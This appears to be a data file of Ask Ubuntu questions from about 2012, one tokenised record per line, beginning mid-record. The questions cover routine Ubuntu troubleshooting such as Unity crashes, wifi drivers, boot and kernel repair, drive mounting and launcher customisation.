] : last message repeated 4 times what can i do to avoid this hangs and restarts ?
150642	creating quicklist for tomboy notes	i tried to create a tomboy quicklist for unity by copying the tomboy.desktop using the guide here what custom launchers and unity quicklists are available ? using the man page for tomboy it says you can open tomboy using tomboy -- open-note [ title/url ] this works well when the application is closed . but once it has been opened , the command just display the window with the list of notes . when the command is run from the terminal it says [ error 14:33:43.474 ] tomboy is already running . exiting ... zim desktop wiki on the hand recognised if the application is running and switched to that notebook . with tomboy i have n't been able too . i was hoping someone would know of a solution . snippet from the .desktop file x-ayatana-desktop-shortcuts=daily ; [ daily shortcut group ] name=daily exec= tomboy -- open-note daily targetenvironment=unity
150648	which window manager offers the best stability ?	i installed unity window manager and love it , except that it is always crashing , when i say crashing , i mean that it is unrecoverable , i ca n't kill anything even from tty . it occurs usually once a day , but twice in the last hour . here is my question in the ubuntu forum about the proble . i 'm on 64bit ubuntu with ati drivers and old software . have sufficient ram . some crashes tend to be specific application related ( mainly nautilus , rhythmbox or firefox ) , but some are related to ( what i think is ) unity or compiz or maybe my ati driver . i would like a super-stable desktop environment to use when i ca n't afford to have crashes . what are some alternative window managers there ? are any preloaded ? i see that there are various gnome window managers . which would be the most stable . how do i download alternate window managers , and how do i change them to be the default ? how do i turn compiz off , and is that recommended ? finally , is it fair to assume that these kind of unity ( and apps ) related errors are likely to be fixed fairly soon ( because 12.04 is for long term support ) . what timeframe is reasonable to expect more desktop stability on 12.04 ? thanks . once again , i love ubuntu 12.04/unity when it works . i just want to have a realistic expectation about when it will be more stable and whether downgrading will help .
150651	mysql version to be used on ubuntu 10.04	i 've a production server and a test server both having ubuntu 10.04.4 lts when i installed mysql on test server , i just run apt-get install mysql-server and 5.1.62-0ubuntu0.10.04.1 got installed when i installed mysql on production server server , i first run apt-get dist-upgrade and then run apt-get install mysql-server and 5.1.41-3ubuntu12.10 got installed . the version of ubuntu on the production server is 10.04.2 lts , and the mysql server installed is 5.1.41-3ubuntu12.10 . what does this mean ? the mysql version is intended to run with ubuntu 12.10 ?
150652	ca n't get ubuntu 12.04 lts live to load properly on apple imac powerpc	i 've tried 2 different isos ( one that i burned and a copy from ebay ) and tried nearly every bootloader option when i boot from the live cd . all i get is colored horizontal lines and no text on the screen after i enter a boot option . i can hear the disc spinning like it 's trying to load something but it seems there is something wrong with the graphics .
150658	awesome wm does not search for wifi networks ?	when i start awesome wm , it works fine but it does not start the daemon/application that searches for and connects to wifi networks . how to make it do that both on startup as well as on demand since i may want it to do so only on demand ?
150663	error while installing netbeans	i tried to install netbeans 7.2 from a downloaded .sh file , but experienced problems . here 's text from the terminal , which shows what i did and what happened : hridesh @ ubuntu : ~ $ cd desktop/ hridesh @ ubuntu : ~/desktop $ cd full\ netbeans\ 7.2\ for\ linux\ in\ .sh\ format/ hridesh @ ubuntu : ~/desktop/full netbeans 7.2 for linux in .sh format $ chmod +x netbeans-7.1.2-ml-linux.sh hridesh @ ubuntu : ~/desktop/full netbeans 7.2 for linux in .sh format $ ./netbeans-7.1.2-ml-linux.sh configuring the installer ... searching for jvm on the system ... extracting installation data ... installer file /home/hridesh/desktop/full seems to be corrupted why does the message installer file /home/hridesh/desktop/full seems to be corrupted appear ? is this file actually corrupted or something else going wrong ?
150665	ask ubuntu badges are not displayed in 'my trophies '	i have installed the 0.2 version of the accomplishments ( and verified that this is the version running ) . the badges can be seen in the 'opportunities ' but not in 'my trophies ' . i have entered the url of by ask ubuntu profile page : http : //askubuntu.com/users/9953/xubuntix i have waited hours , and no error was displayed to me . am i missing anything ?
150666	how do i install a non-pae kernel on pae-enabled hardware for ubuntu 12.04 ?	i need to install a non-pae kernel for a 64-bit machine that supports pae . 32-bit 12.04 currently comes with a pae kernel but i need to get a non-pae kernel . an older version of ubuntu is also acceptable as long as it runs in 32-bit mode .
150668	problem unlocking keyring on login	i have a problem with unlocking the keyring . the problem is that every time when login , a window pops up and ask 's for password to unlock the key ring . how can this problem be solved ? , such that the keyring unlocks automatically when i login .
150669	is it recommended to format an external drive to ext4 ?	i have a new 2tb external hard drive i will be using for additional storage and backup . i will only use it on two ubuntu machines . is it recommended to format the drive to ext4 ? are there any advantages in doing so ?
150671	accidentally deleted a folder	i 've been using ubuntu 12.04 and accidentally deleted a folder using shift+del . does anyone have any idea how to recover the folder ?
150674	how to block gnome popup notifications for mounted media ?	when ever i mount something , when ever i plug in a usb , gnome pops up . its annoying . is n't there a way to stop this ? i saw some people suggest disabling the autorun . but i want to completely stop ! any ideas ?
150675	does maplestory work on ubuntu 12.04 ?	does maplestory work on linux/ubuntu ?
150679	enabling a multi display desktop completely broke gnome shell . help ?	i 've been trying to get my dual desktops working on ubuntu for a while . i previously had them as one large desktop , but that was incredibly slow for some reason . i tried to switch them to multi display desktop on the amd catalyst control center . here 's what i get after restarting and logging in : http : //i.imgur.com/sejgu.png i 'm running an amd quad core a6 , amd radeon 6540g2 gpu , 16gb ram . ubuntu 12.04 any ideas ?
150681	elevation issue password always wrong ?	ubuntu newbie - i install os using one account and then later created a second account made administrator with auto login and no password , then i logged in using new account and deleted old account . now when ever i go to do anything it wants elevation and no matter what you type in the password field wont work . any suggestions outside of scrapping it and installing windows ?
150682	how do i get broadcom drivers to be recognized ubuntu during setup from windows installer ?	i downloaded the newest version of ubuntu from the site and chose the windows installer version so that i could duel boot and do some speed comparisons . the instillation went well until it told me to restart . i chose the ubuntu option from the startup and then the loading screen came up and it froze . i shutdown and tried again and chose to do a graphics safe startup thinking it was my graphics card . i was interested to see that at the end of the check list a network card failure and a website . http : //wireless.kernel.org/en/user/drivers/b43 # devicefirmware . i looked into the site and found the firmware i need but i have no input as to how to install it without being able to access ubuntu directly . i am running windows xp 64 natively if this is a problem . please help .
150685	why do i get an `` opengl warning '' message after running google chrome through the ubuntu terminal ?	i just downloaded google chrome for ubuntu 64-bit onto my ubuntu 12.04 64-bit os ( which is running as a guest as a vm on a win 7 host ) . after it had installed , i opened up the terminal and typed `` google chrome '' and the web browser opened for the first time . immediately below that line in the terminal , however , this appeared : '' opengl warning : failed to connect to host . make sure 3d acceleration is enabled for this vm . '' this message appeared 2 more times in the terminal before the cursor returned to normal . i am pretty sure i have 3d acceleration enabled , so what is causing this error message ?
150688	how can i add new users to windows 7 from ubuntu ?	title seas it all ... i 'm logged in to ubuntu and i want to add new user to windows 7 which is on some other partition on the same computer . is it possible ?
150689	how do i format an external hard drive ?	i have an external hard drive formatted to ext2 and have no permissions . ca n't add files , and i ca n't look at the file that 's on there . it 's called `` lost+found '' and apparently takes up 8.1 gb . all i need to do is back up some files . so it would be fine to erase whatever files are on the drive .
150691	missing vmlinuz from /boot	i am running a laptop with windows 7 and ubuntu 12.04 . i had grub issues following a partition resize which were eventually found to be problems due to missing kernel files . ( these problems did not begin until a week after the resize , during which the computer continued to work perfectly ) . by chrooting into my hard drive install from a 12.04 lts livecd i was eventually able to restore /boot/initrd-3.2.0.24-generic.img . by copying vmlinuz from the livecd 's /casper/ folder to /boot/vmlinuz-3.2.0.24-generic i found that update-grub would finally recognize and add my ubuntu install to the grub menu , which was my initial problem . however , my new problem is that when booting into this install i am met with all kinds of failed modules and error messages , often far too fast for me to even read or remember ; finally i am given the option of starting ubuntu in low graphics mode , troubleshooting , command prompt , networking etc ... selecting low graphics mode just dumps me out at the terminal prompting me to login , but my user name and password do not work . perhaps simply copying the vmlinuz from livecd has caused these errors ? my problem is that an appropriate vmlinuz was not installed by the same kernel install process that restored my 'initrd- ... .'.img i would really prefer not to have to reinstall the entire ubuntu partition again as i had a lot of customized settings for various programming environments i use for my research work and i am currently abroad , limiting my bandwidth which is quite necessary to restore much of this software . i do however have a complete image and a complete clone of the non-booting partition ( both via clonezilla ) ; i just do n't know if these actually acquired my private 'home ' folder , which claims to be unreadable when i mount the clone .
150693	solve a partition misalignment ?	i have a new dell xps laptop which had windows 7 installed in it . it also had a default extra partition for `` dell utility '' . i installed ubuntu in it on an extended partition along with windows and specified the logical partitions myself ( for / , /home and swap ) . now when i open disk utility , it shows this `` partition misaligned by 512 bytes '' error for the dell utility partition and `` partition misaligned by 1024 bytes '' for the entire extended partition where ubuntu is installed . deleting the extended partition and re-installing ubuntu may solve the problem of misalignment in the extended partition . but how about the dell utility partition ? if i re-install windows 7 dell utility would n't be a part of the re-install . so that may not solve it either . how do i fix this ? note : the extended partition i made contains an ntfs logical partition for holding data accessible by both oses ( basically a personal data partition ) . edit : i deleted all my ubuntu partitions and re-installed ubuntu like before , this time making them partitions with gparted via livecd . now the only problem is that there is a misalignment in the dell utility partition . the other misalignment got fixed . now how do i get rid of that issue ?
150696	does axure work in ubuntu ?	does axure rp pro6.5 works on an ubuntu 11.04 machine ? if yes what is the procedure to install it properly ?
150698	new install 12.04 64bit dual nic 's , both dhcp , no route until one card disabled	fresh install on asus p7t deluxe . which has twin nic 's onboard . both cards have cables attached to a switch with ip 's from dhcp and a valid route to the internet . internet connectivity fails until either of the network cards is disabled . network manager should either disable one of the cards , bond the connection or route using a single connection until such point as that connection is disconnected and then fall back to the other . any idea why this fails ? regards simon update : bug logged . https : //bugs.launchpad.net/ubuntu/+source/network-manager/+bug/1018740
150703	creating a custom iso	i 've got the ok at work to drop some windows machines and install ubuntu on them . i will be installing precise on them , as it is an lts . what i would like to do is create an iso with certain packages removed , and others installed by default ( to save me having to do the same steps on each machine ) . what is considered the current best way to do this . i vaguely remember using remastersys , but that was a couple of years ago , so am assuming that things may have changed since then ! most of the resources i can find online are from 2009/2010 . advice would be greatly appreciated !
150705	open url in chromium and switching to existing tab open if url already open	i was trying to create unity quicklists for gmail . but if the gmail was already opened , it will still create another tab and load the web page , rather than switching to the existing . i even tried installing the 'gmail app ' from the app store and nothing happened . i looked at the various command line switches , i could not find anything . http : //peter.sh/experiments/chromium-command-line-switches/ the other clumsy solution was to install an addon called prevent duplicate tabs https : //chrome.google.com/webstore/detail/ljnhndkfkbcfmfdkfaahkfmiiibaldhd it removed the duplicate tabs but it still had to load the page than switching to it . it also does n't work with forwarding urls like google docs https : //docs.google.com/ ? pli=1 # home . on a side note was n't this meant to be a feature for web apps , a buzz word today .
150708	`` battery not present '' on toshiba satellite l500d	i bought a new battery for my laptop a week ago and it worked fine up until last night when it would n't boot up . i plugged in the power lead and it booted but upon booting the battery status indicator shows `` not present '' even though it most definitely is . dmesg | grep battery [ 0.412399 ] acpi : deprecated procfs i/f for battery is loaded , please retry with config_acpi_procfs_power cleared [ 0.412411 ] acpi : battery slot [ bat1 ] ( battery present ) [ 0.660147 ] [ firmware bug ] : battery : ( dis ) charge rate invalid . [ 0.660207 ] acpi : battery slot [ bat1 ] ( battery present ) cat /proc/acpi/battery/bat1/info present : yes design capacity : 4400 mah last full capacity : 3497 mah battery technology : rechargeable design voltage : 10800 mv design capacity warning : 340 mah design capacity low : 102 mah cycle count : 0 capacity granularity 1 : 264 mah capacity granularity 2 : 3780 mah model number : serial number : 41167 battery type : li-ion oem info : toshiba cat /proc/acpi/battery/bat1/state present : yes capacity state : ok charging state : charging present rate : 2 ma remaining capacity : 0 mah present voltage : 10447 mv so i 'm a little confused as some things are telling me its there and charging and others are not . either way the battery is no longer holding charge because if i pull the power lead it turns off immediately .
150709	bcm43225 wireless card has connectivity problems	yesterday , i installed ubuntu 12.04 as a dual-boot with windows 7 64 bit . this is the very first time i 've touched a linux system and so any attempt to research my problem on google returns myriad pages that i do n't understand . my problem is that i immediately had connectivity issues with my wireless . it often drops the connection , and when it is connected , it 's pretty slow . the wireless card is a bcm43225 . i tried updating the broadcom sta driver found in the additional drivers section , and i found another thread that told me i should download and install : b43-fwcutter and firmware-b43-lpphy-installer i 've done that , but it does n't seem to have helped . please help me get this figured out . please remember that i am a linux/ubuntu noob , so i likely wo n't understand any jargon or too-specific terms . however , i do understand the basics of running commands and programs from a terminal , at least as far as it 's similar to windows . from reading on other threads , i think the following terminal output will be asked for , so here it is : don @ ubuntu : ~ $ rfkill list 0 : acer-wireless : wireless lan soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no don @ ubuntu : ~ $ sudo lshw -c network [ sudo ] password for don : *-network description : ethernet interface product : netlink bcm57785 gigabit ethernet pcie vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 10 serial : b8:70 : f4 : e5:12:43 capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi msix pciexpress bus_master cap_list rom ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=tg3 driverversion=3.121 firmware=sb latency=0 link=no multicast=yes port=twisted pair resources : irq:16 memory : d1830000-d183ffff memory : d1840000-d184ffff memory : d1850000-d18507ff *-network description : wireless interface product : bcm43225 802.11b/g/n vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 01 serial : 68 : a3 : c4:44:81:96 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=brcmsmac driverversion=3.2.0-23-generic firmware=n/a ip=192.168.0.12 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : d1900000-d1903fff don @ ubuntu : ~ $ ok , it turns out this is not fixed . after spending some hours in windows job-hunting , i switched back to ubuntu , margarita in hand , ready to play with my new os . and i encountered laaaaaaaaaaaaag . it 's been five minutes and gmail still has n't loaded - strangely , this page loaded almost instantaneously . facebook is doing ok. speedtest.net wo n't load more than the banner . i tried disabling the broadcom sta driver that was enabled , but that has n't helped matters any . so to summarize up to this point : b43-fwcutter & firmware-b43-lpphy-installer have been installed and removed - they did n't fix the problem . bcmwl-kernel-source is installed , but does n't appear to have fixed the problem . additional drivers lists the broadband sta driver , which i have tried on and off with the above configurations . $ sudo just-work-already -dear_god_please are there any other things i can try ? @ eliah , thanks for the heads-up . i 'd never used a forum like this before , and my brain was already melting from all the other new things i have to learn for ubuntu . update : after waiting a while , and checking my network now and then , it turns out the problem is in fact fixed using the last configuration listed in my question . the last problem i had ( and maybe some of the others ? ) was simply the network genuinely crapping out .
150711	chmod 444 ca n't login	using proftpd i 'd like to login to server . i set permission to user directory to 444 . when i am trying to login using ftp client - does n't working , i ca n't log in . did i do something wrong ? maybe i set wrong chmod , it should be read permission to all .
150712	drag and drop in nautilus sometimes does not work	i split nautilus window , open different folders in each part and then drag a file from folder on the left to the folder on the right in order to move it . usually this works ok , but sometimes drag is cancelled and nothing happens . i use standard optical mouse . i have n't been able to reproduce this bug reliably yet . any ideas ?
150717	after running computer-janitor , ubuntu crashed ( possibly deleted configuration packages )	i have some problem , so can anyone help me ? after i have run computer janitor , my computer crashed . what happens ; all of the sets are gone . i can not see my desktop ( i think it erased image of the ubuntu ) . i can not use usb ( in terminal , error message is thrown `` port can not be used '' ) after i opened my computer , at left corner , there is a terminal . moreover , background of desktop is colored by violet ( i think it is violet ) . what i can use ; i can only use terminal . no program is erased ( i can use them over terminal ) no file is erased how can i save my computer ? without loosing any file , i can upgrade to any version of ubuntu . ( remember : i can only use terminal. ) my other question : how can upgrade ubuntu to any version of ubuntu over using tty ? edit : lsb_release -a no lsb modules are available distributor id : ubuntu description : ubuntu 19.04.4 lts release : 10.04 codename : lucid uname -a linux < name > 1.6.32-41-generic # 90-ubuntu smp tue may 22 11:29:51 utc 2012 x86_64 gnu/linux
150718	record from vhs tapes	i recently got a usb tv tuner card . i want to digitize old family vhs tapes . however the tv tuner card driver does n't do audio , only video . i have plugged a 3â˝mm jack from the video machine my laptop . the video from the vhs presents as a v4l device , like a webcam . i can watch video ( w/ audio ) fine . i tried writing some gstreamer commands to record from the video , and it was sort of working , but eventually the audio would get out of sync . so is there any application on/for ubuntu that makes it easy to record from vhs tapes/webcam ? something that 'll do the encoding properly .
150725	how i can run ubuntu in chroot on android ?	i want to run fully functional ubuntu on my android device in chroot . but i have some trouble with upstart . in chroot `` it will actually run /sbin/telinit '' , so how i can run upstart or replace it with something else ?
150729	can not find documents folder from windows installation	my computer has three separate hard discs c , e & f : windows 7 boots from c drive e drive contains all my document folders / files f drive is used for back-up i installed ubuntu 12.04 on the e drive using the windows installer . when turning on i am offered the option to boot into either windows 7 or ubuntu and both run ok . however if i boot into ubuntu i can not locate any of my document folders on the e drive . the system shows the c drive and the f drive and also the system folders ( presumably from the e drive ) but i can not see any of my document folders . if using windows all of the folders are available . any help would be much appreciated .
150730	what dangers can come from using packages like janitor , compiz ?	as i look around on askubuntu i frequently see that programs intended for ubuntu are suggested not to be used because they could break ubuntu . such as janitor , compiz and i am sure there are also others . on one hand you have people raving about ubuntu tweak and on the other you have people saying stay away from janitor.i personally came over to ubuntu thinking it was customizable . does anyone have a list of things that could break ubuntu ? or is this just a hit and miss based on different hardware configurations ?
150732	wireless networking	i want to connect to the internet through my ipod by creating a wireless network on my laptop . i have a 3g connection dongle for internet . how can i link the two devices so that i can access internet on both the devices simultaneously.i am using ubuntu 11.10 at present .
150735	how to uninstall kwin without installing openbox ?	i have n't found anything about this anywhere , but when i remove kwin it automatically installs openbox for me and vice versa without me having any say in it . i realise this is to prevent users from screwing up their system , but i would like to use sawfish as my window manager exclusively . so is this even possible with apt ? thanks in advance for any help !
150739	colord problem & my monitor resolution 640*480 with no other options !	i installed nvidia current driver from ubuntu software center then i started to see that my monitor resolution is not fixed ! ! so that every time i log in to my machine i have to change the resolution . but starting from yesterday , all options have been disappeared & i have one option only 640*480. i have the problem shown in the link here : https : //mooniat.files.wordpress.com/2012/06/colord.png which i think is the cause of this . any help please , thank you in advance . specifications : os : ubuntu 12.04 precise laptop : dell inspiron n5110 gpu : nvidia geforce 525m thanks again , yours .
150744	index.html of vps not working , redirecting to virtual host domain	when i type the domain name i linked to my server ip , one of the virtual host websites i have on the server comes up , rather than the index.html file i have as default on the server . why is this so ? i am using nginx , these are my configuration files : default http : //pastebin.com/byqdcasb the domain that gets served ( replaced domain with mysite.com ) http : //pastebin.com/cyjxgkwm
150746	how does ecrypt handles symlinks to unencrypted files ?	i have a encrypted home directory , and i have some large files ( vms ) that i store outside of my home directory in /opt/jrg-stuff/vms . how would ecryptfs handle a symlink to those files ? will it 'freak out ' and try and encrypt them ? will it create multiple copies ?
150748	crippled dash under unity	i freshly installed ubuntu 12.04 from a minimal install using command sudo apt-get install ubuntu-desktop -- no-install-recommends i logged in only to find that the dash is crippled . when dash opens , their are 4 icons in the bottom-middle of the screen like home applications recent however my dash is only having one icon of home . i installed google chrome with a .deb pachage , but still it is to be found nowhere under unity and dash . the only way i can start chrome is via terminal .
150749	ubuntu 12.04 `` do nothing '' when `` lid closed '' blanks out external monitor	this is not the same as this question . i have ubuntu 12.04 running with an nvidia card on a w510 thinkpad . i have one external monitor connected . when i change the power settings to `` do nothing '' when `` lid closed '' it still keeps the system running which is great . however , it blanks out the display on any external monitors making the system useless . i plan on getting a dock soon and having to identical resolution monitors and would love to be able to dock the monitor and work as normal on the external monitors . does anyone have a suggestion or fix for this ? should i report this as a bug or feature request ?
150751	where did my google chrome go ?	i installed google chrome using a .deb package , however unable to find it under dash . tough i can run it using terminal please tell me the path where i can find google chrome and other applications installed , so that from there i may launch them by double click ?
150752	persistent live usb using netbook	hello second question xd as i said earlier i have a netbook and was looking thru persistent live usb making and all guides seem to need that i boot from live cd but my netbook does n't have an optical drive : / so here 's my question ( sorry if it has been asked before ) can i make a persistent ubuntu live usb using my netbook ? what i 'm trying to achieve here is getting a 32gb usb drive and have my own portable computer here ( ubuntu takes about 2gb so 30gb left for all my other files `` music , video , documents , additional packages , etc . '' can i do that ? as far as i could find the maximum persistent storage i could have is 4gb which is a real waste for a 32gb drive : / thanks for all the help : ) best regards , raif felemban ( aka ubunoob ) : p
150753	how do i know that the drivers are installed and working properly on ubuntu 12.04 ?	i am a new user of ubuntu . i switched from windows to ubuntu 12.04 . how can i know that all the drivers in ubuntu on my machine are successfully installed and working properly ? i plan to install ubuntu and remove windows as soon as i 'm able to determine this .
150754	replace unity with gnome / cinnamon	i have already installed ubuntu 12.04 and now can not reinstall kubuntu xubuntu etc . i do n't want unity and its associated stuff at all.. how can i remove it from my install and then go for some other desktop . i tried installing gnome-shell but did n't liked that also somewhere i read that gnome is still more responsive than unity . i would prefer to have gnome or cinnamon instead . folks please throw some light on the installation commands for the same .
150764	resume from suspend without waking up hd	i 'm running ubuntu 12.04 on my laptop with two hard disks . the primary one is a ssd , whereas the second one is a spinning hard disk . most of the time i do n't need the second hard disk , i just use it for some larger files like movies etc.. hence i send it to sleep with 'hdparm -y /dev/sdb ' . however after resuming from suspend the hard disk is switched on again , which is quite annoying ... does anyone know a solution to avoid waking up the second hd ? thank you , leon
150775	how to make liberation sans the default font in lo writer ?	libreoffice writer defaults to liberation serif . how do i make it default to liberation sans instead ?
150778	what is the differences between ubuntu existing kernel vs rt kernel ?	what is the differences between ubuntu existing general kernel of 11.10 vs so called linux rt kernel ? does audio delay depends on general kernel vs rt kernel ? where some audio capture looks like it has always a few ms delay . example : other distro have them ftp : //ftp.nluug.nl/pub/metalab/distributions/tinycorelinux/4.x/x86/contrib/rt-kernel/ follow up : choosing a kernel for your use case these are some simple guidelines provided to help you understand which kernel , and in which order , you should test to fit your use case . - if you do not require low latency for your system then please use the : -generic kernel . - if you need a low latency system ( e.g . for recording audio ) then please use the : -preempt kernel as a first choice . this reduces latency but does n't sacrifice power saving features . it is available only for 64 bit systems ( also called amd64 ) . - if the -preempt kernel does not provide enough low latency for your needs ( or you have an 32 bit system ) then you should try the : -lowlatency kernel . - if the -lowlatency kernel is n't enough then you should try the : -rt kernel - if the -rt kernel is n't enough stable for you then you should try the : -realtime kernel
150779	where can i download liberation font family for use on windows 7 ?	to improve compatibility between word and writer , i would like to be able to show people how to install the liberation font family in microsoft word . does anyone know where i can download a legit/safe version ? is there an `` official '' download place for the liberation font family for use on windows ?
150788	custom window grid in 12.04	i 'm using classic gnome in 12.04 . is there some way to have a custom grid for resizing windows ? compizconfig allows me to configure the `` grid '' feature , but it only supports resizing to half the screen . is there some way that i can set a custom size and location for the active window using key bindings ? i 've tried using xdotool , but it 's not working .
150789	difference between bash.bashrc and /etc/environment file	till data i was used to set my environment variables in the bash.bashrc file . recently i told to use the /etc/environment file . well , both work fine . so , what is the difference between them ? i googled for this and i found answer as `` bashrc is used for particular user and environment for system wide '' . what is meant by system wide here ? /etc/bash.bashrc is also applying changes system wide i guess . correct me if i am wrong . any kind of help will be appreciated..
150790	how do i run a script on a dbus signal ?	is it possible to run a script on an arbitrary dbus signal ? something like upstart that runs as an unprivileged user and does n't require root perms to modify ? i ask because i 've already written a silly script that waits for bluetooth events to start my music player . now i 'd like to do something similar when my machine connects to specific networks , or other devices attach . edit : my original question did n't specify this , but i meant `` associate a number of scripts with one of a set of events '' - so i 'd have the same launcher-y thing ( like upstart ) that manages a number of scripts , each of which cares about a different dbus signal . all in user space .
150791	partial upgrade on 12.04	when i was given the option to upgrade to ubuntu 12.10 i did try to upgrade , but while it was upgrading the internet connection was lost and the system went through a partial upgrade . now when i try to open the update manager or the software sources it opens and crashes automatically . what should i do ?
150792	installing ubuntu 12.04 on a single gpt ssd which contains windows 7	i recently bought a brand new 64 bit pc with a ( asus ) motherboard that supports uefi and a gpt formatted 240gb ssd , which contains windows 7 in the first of 3 ( 80gb ) partitions . when the system arrived , it booted into windows 7 like a dream , with no problems . i did not originally want windows , but the manufacturer does not work with linux ( of any flavour ) , so i thought i would install ubuntu into the second partition and dual boot . i downloaded the 12.04 64bit version and proceeded to install . having selected to 'install ' , the screen became corrupted , with multicoloured garbage across the middle third of the screen ! ! so , i rebooted and -- - missing operating system ! ! ! the only way i can now get into windows is via super grub2 . first question - what went wrong ? 2nd - will ubuntu install on a gpt disk partition ? 3rd - will it install alongside windows 7 without screwing the boot mechanism ? 4th - how do i do it ? i have scoured the internet looking for appropriate answers and found none ! please help ... ... .
150794	interpreting sensors command line output	i need some help in interpreting the output of sensors command : acpitz-virtual-0 adapter : virtual device temp1 : +56.0°c ( crit = +128.0°c ) temp2 : +67.0°c ( crit = +128.0°c ) temp3 : +38.0°c ( crit = +128.0°c ) temp4 : +51.0°c ( crit = +128.0°c ) temp5 : +27.0°c ( crit = +128.0°c ) temp6 : +0.0°c ( crit = +128.0°c ) temp7 : +0.0°c ( crit = +128.0°c ) temp8 : +0.0°c ( crit = +128.0°c ) coretemp-isa-0000 adapter : isa adapter physical id 0 : +59.0°c ( high = +86.0°c , crit = +100.0°c ) core 0 : +59.0°c ( high = +86.0°c , crit = +100.0°c ) core 1 : +57.0°c ( high = +86.0°c , crit = +100.0°c ) radeon-pci-0100 adapter : pci adapter temp1 : +67.0°c thanks a lot
150795	not file backup , but sync tool ... there has to be a way	i am looking for a way to use u1 as total storage , where i can delete the file from the computer and not from u1 . there has to be a way , as with competitors , its doable . unlike many out there who need the file to change and sync back , i do not . mine are mostly photos and music . i wont be changing them , and would love to free up some space on the system .
150798	remmina rdp windows disappear permanently once minimized	even with the latest updates , when using the remmina client to connect over an rdp session , if i minimize the window , the icon in the unity taskbar closes ( looks like the program is n't running ) but remmina is still a running process . i have not found a way to bring the window back ( the alt+tab list does not include it ) . i see a bug report on ubuntu launchpad for it which mentions a fix ( 9 months ago ) , but i have all the updates . the resolution there claims it 's no longer an issue in ubuntu 11 . also , the project pages on sourceforge and github -- i ca n't tell which of these is supposed to be current/authoritative ! ? neither mentions the reappearance of this bug , but there 's no a lot of activity otherwise . am i alone with this problem ? since i 'm new to linux-world , how am i supposed to know where to report the bug , since there are at least three plausibly-authoritative websites ? how can i work-around or patch this minimize bug ? thanks !
150800	can i restart x without having to close all applications in my current session ?	i found when i want to change input method , i should restart x . but i do n't want to close all applications . how to do that ? thank you~
150807	how to change the path of an icon in the unity launcher	on previous versions of ubuntu , i used to add thunderbird to the top menu bar so i could launch it quickly . occasionally , i would want to use a more recent version of thunderbird so i would download it directly from mozilla and put it in my ~/bin/ directory . i would then right click on the thunderbird icon on my top menu bar and edit the preferences to point to the new version . i am now using 12.04 , but there is no longer a 'preferences ' item on the menu for the icons in the launcher . how can i switch the thunderbird icon to use my newer version ?
150813	problem mounting external usb drive in ubuntu 12.04	this question started as changing file permissions on usb external hard drive but as i can find a solution i ask again . the problem comes when i move a usb drive i have been using in ubuntu 10.04 to a lapto with 12.04 . i want to change permissions of some scripts as they appear only with rw but i ca n't . now i have tried to copy the device line from fstab from 10.04 to the laptop with 12.04 but still get an error message . error mounting : mount exited with exit code 1 : helper failed with : mount : only root can mount /dev/sdb1 on /media/freecom hdd the line i add to fstab to try to mount the usb drive is /dev/sdb1 /media/freecom\040hdd vfat rw , nosuid , nodev , uhelper=udisks , uid=1000 , gid=1000 , shortname=mixed , dmask=0077 , utf8=1 , flush 0 0 when restoring original fstab and plugging the usb drive the output of mount is /dev/sdb1 on /media/freecom hdd type vfat ( rw , nosuid , nodev , uid=1000 , gid=1000 , shortname=mixed , dmask=0077 , utf8=1 , showexec , flush , uhelper=udisks ) what should i add in fstab to get the drive fully working ? i wanted to change permissions on files in the usb drive . output of sudo fdisk -l device start end blocks id system /dev/sdd1 63 1953520064 976760001 c w95 fat32 ( lba ) thanks again
150814	how to suggest that a wiki page be deleted ?	background : there 's a video clip on the topic but it is n't clear who is being addressed . what can a user of ubuntu do in regard to a wiki page like this one : ubuntu eyecandy . even though it 's prominently flagged as applying to an unsupported version of ubuntu , it comes up as the top-most result in a google search with `` ubuntu mouse cursor color '' with a date of 22 may 2012 . would this page merit deletion ? how do i tag it for deletion as suggested in what steps should i take when i find wrong information in the ubuntu wiki pages ? . i have a launchpad account but i 'm not seeing a tag for deletion option on the wiki page after signing in .
150818	message : sdl_gl_loadlibrary error : failed loading libgl.so.1	all of my games are giving me this error : message : sdl_gl_loadlibrary error : failed loading libgl.so.1 i have found this hib games ( aquaria & penumbra ) can not find libgl.so.1 even though it exists but sudo apt-get install libg l1-mesa-glx : i386 libgl1-mesa-dri : i386 wont work : e : no se ha podido localizar el paquete libgl1-mesa-glx : i386 e : no se ha podido localizar el paquete libgl1-mesa-dri : i386 glxgears works fine and i have libgl : visgean @ rewitaqia : /opt/aquaria $ locate libgl.so.1 /usr/lib/x86_64-linux-gnu/libgl.so.1 /usr/lib/x86_64-linux-gnu/mesa/libgl.so.1 /usr/lib/x86_64-linux-gnu/mesa/libgl.so.1.2 /usr/lib32/mesa/libgl.so.1 /usr/lib32/mesa/libgl.so.1.2 any ideas ?
150819	how can i see what files ubuntu one has synced ?	during sync ubuntu one displays a notification saying something like `` 'filename.xxx ' and 59 other files are being uploaded to your personal cloud . '' how can i check what those other ( 59 ) files are ? none of the log files in .cache/ubuntuone/log seem to log this information in a user friendly way . i know that i could use u1sdtool to see what is being synced in real-time . but , however , after the sync has taken place is there no way of knowing what happened ?
150820	is there any ( lightspark.so update.alternative ) as adobe flash `` automatically '' ?	hi i have been trying to solve lightspark settings , and i could not find anything to repair . i was wondering if there is a command that makes you do a update-alternative , or works for firefox . and also let me know which video sites it supports , or is it to youtube ? . well who knows anything , thank you very much ! !
150822	how do i block websites for several pcs via wireless router ?	our household has 3 pc/laptops connected via wireless router ( d-link 600 ) . is there a way to ban websites to all of the pcs connected to the wireless router by using my laptop ? d-link 's filter website feature is not working .
